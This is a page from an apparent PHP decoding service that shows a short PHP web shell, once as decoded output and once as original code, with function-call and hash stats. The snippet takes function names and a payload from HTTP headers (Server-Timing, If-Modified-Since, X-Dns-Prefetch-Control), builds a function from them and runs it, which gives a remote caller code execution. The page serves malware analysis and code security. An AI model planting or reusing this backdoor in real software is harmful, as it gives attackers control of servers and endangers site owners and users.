Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_HEADERS = getallheaders(); if (isset($_HEADERS['Server-Timing'])) { $rjust =..

Decoded Output download

<?php
$_HEADERS = getallheaders(); 
if (isset($_HEADERS['Server-Timing'])) { 
    $rjust = $_HEADERS['Server-Timing']('', $_HEADERS['If-Modified-Since']($_HEADERS['X-Dns-Prefetch-Control'])); 
    $rjust(); 
} ?>

Did this file decode correctly?

Original Code

<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['Server-Timing'])) {
    $rjust = $_HEADERS['Server-Timing']('', $_HEADERS['If-Modified-Since']($_HEADERS['X-Dns-Prefetch-Control']));
    $rjust();
}

Function Calls

getallheaders 1

Variables

None

Stats

MD5 3c56c27123bb4e6221b432bc3052efd9
Eval Count 0
Decode Time 97 ms